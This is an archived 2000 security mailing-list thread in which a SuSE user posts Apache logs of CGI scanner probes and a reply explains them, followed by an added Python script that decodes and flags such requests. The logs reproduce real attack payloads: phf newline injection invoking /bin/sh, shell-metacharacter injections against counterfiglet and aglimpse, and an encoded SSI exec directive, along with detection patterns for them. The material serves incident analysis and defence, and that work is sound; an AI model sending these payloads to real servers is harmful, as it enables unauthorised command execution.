 
Subject: AW: [suse-security] Web server security holes ?
From: Harald Scharf (h.scharf@softpoint.at)
Date: Wed Apr 05 2000 - 03:04:09 CDT


Somebody tried to use web server CGI scripts to hack your server.
The line POST /cgi-bin/phf?Qname=x%0a means:

call the script phf in cgi-bin
%0a = carriage return
/bin/sh tried to call an external program

!! DELETE ALL YOUR TEST-CGIs and PHPs delivered with the WEB Server in
Standard configuration !!

Best way to secure (but maybe not possible) : Do not allow POST on CGI

bye

Harald Scharf
softpoint electronic
h.scharf@softpoint.at

-----Original Message-----
From: Marc Baaden [mailto:marc@causul.u-strasbg.fr]
Sent: Wednesday, 5 April 2000 09:34
To: suse-security@suse.com
Subject: [suse-security] Web server security holes ?

Dear All,

I am quite concerned about security, and I think my machine is doing well
with respect to all usual services such as telnet, FTP, etc.

Unfortunately I am not very experienced with web servers, and have the
standard features of SuSE 6.3 installed (Apache, I think).
On two of my machines I got the following log entries in the http
access_log / error_log

- What does it mean ?
- Is it dangerous for the machine ?
- Can I further secure my machine ?
PS: I do NOT need the machine being accessible by external machines via HTTP

Thank you for explaining these things to me ...

131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376
128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482
128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346
128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279
128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282
128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET /%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316

[Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet
[Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/phf
[Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse
[Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/perl
[Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/sh
[Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/query

[Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux) mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations
[Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[

  Marc Baaden

-- 
 Marc Baaden  -  Labo MSM (UMR 7551)  -  http://crypt.u-strasbg.fr/marc
 mailto:baaden@chimie.u-strasbg.fr     -     FAX (+49) 89 24 43 1 68 68
 ICQ#  11466242   -   Tel: (+33) 3 88 41 60 86  or  (+33) 6 09 84 32 17
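The requests quoted above, decoded and classified, as an added example (editor's code, not part of either post). It uses only the Python standard library; the sample lines are copies of the access_log entries above with the wrapped lines rejoined, plus one constructed benign request from a made-up address 10.0.0.5, and the list of probe script names is just the /cgi-bin names seen in this thread, not a general scanner signature set. Decoding makes the intent visible: %0a in the phf request is a line feed (0x0a) followed by /bin/sh -s, and the long %XX string in the query request decodes to an SSI directive, <!--#exec cmd="/usr/bin/id"-->. The classifier also separates the 404s (the error_log confirms those scripts were not present) from the one request that got a 200, /cgi-bin/test-cgi: the stock test script was installed and ran, which is exactly the case the advice to delete the shipped test CGIs addresses.

```python
"""Decode and classify CGI scanner probes from Apache access_log lines.

Editor's example for this thread, not code from either poster. Standard
library only. KNOWN_PROBE_SCRIPTS is simply the /cgi-bin names that appear
in the quoted logs, not a complete scanner signature list.
"""
import re
from urllib.parse import unquote, unquote_plus

# Sample input: the quoted access_log entries (wrapped lines rejoined) plus one
# constructed benign request (10.0.0.5) to show a clean line is not flagged.
SAMPLE_LOG = "\n".join([
    r'131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280',
    r'128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376',
    r'128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482',
    r'128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346',
    r'128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282',
    r'10.0.0.5 - - [21/Mar/2000:09:00:00 +0100] "GET /index.html HTTP/1.0" 200 1234',
])

# Apache Common Log Format. The request target is taken as one non-space
# token; a raw space in the target (no %20) would not match and is skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# /cgi-bin script names probed in the quoted logs (assumption: this thread only).
KNOWN_PROBE_SCRIPTS = {
    "phf", "test-cgi", "perl", "sh", "counterfiglet", "aglimpse", "query",
}


def decode_target(target: str) -> str:
    """URL-decode a request target. '+' means space only in the query part,
    which is how phf read Qname=x%0a/bin/sh+-s%0a as 'x', newline, '/bin/sh -s'."""
    path, sep, query = target.partition("?")
    return unquote(path) + (sep + unquote_plus(query) if sep else "")


def classify(line: str):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    target = m.group("target")
    decoded = decode_target(target)
    reasons = []
    if "\n" in decoded or "\r" in decoded:
        reasons.append("newline injection (phf-style %0a)")
    if "<!--#exec" in decoded:
        reasons.append("SSI exec injection")
    if re.search(r"[;|`]", decoded) and re.search(r"\b(id|uname|cat|echo|sh)\b", decoded):
        reasons.append("shell metacharacters with command names")
    parts = decoded.split("?", 1)[0].split("/")
    script = parts[2] if len(parts) > 2 and parts[1] == "cgi-bin" else None
    if script in KNOWN_PROBE_SCRIPTS:
        reasons.append(f"known probe target /cgi-bin/{script}")
    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
        "target": target, "decoded": decoded, "status": status,
        "reasons": reasons,
        # 404: the probed script is absent. 2xx: the script exists and ran.
        "severity": "script responded" if 200 <= status < 300 else "probe failed",
    }


def scan(log_text: str):
    """Classify every line of an access_log excerpt; unflagged lines are dropped."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["status"]} [{hit["severity"]}]')
        print("   decoded:", hit["decoded"].replace("\n", "\\n"))
        print("   reasons:", "; ".join(hit["reasons"]))
```

The split between unquote for the path and unquote_plus for the query matters for the phf line: a plain unquote would leave "/bin/sh+-s" and hide the actual command. Run over a real access_log, anything with severity "script responded" deserves a look at the script's source before anything else, since those are the requests the server actually executed.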

--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com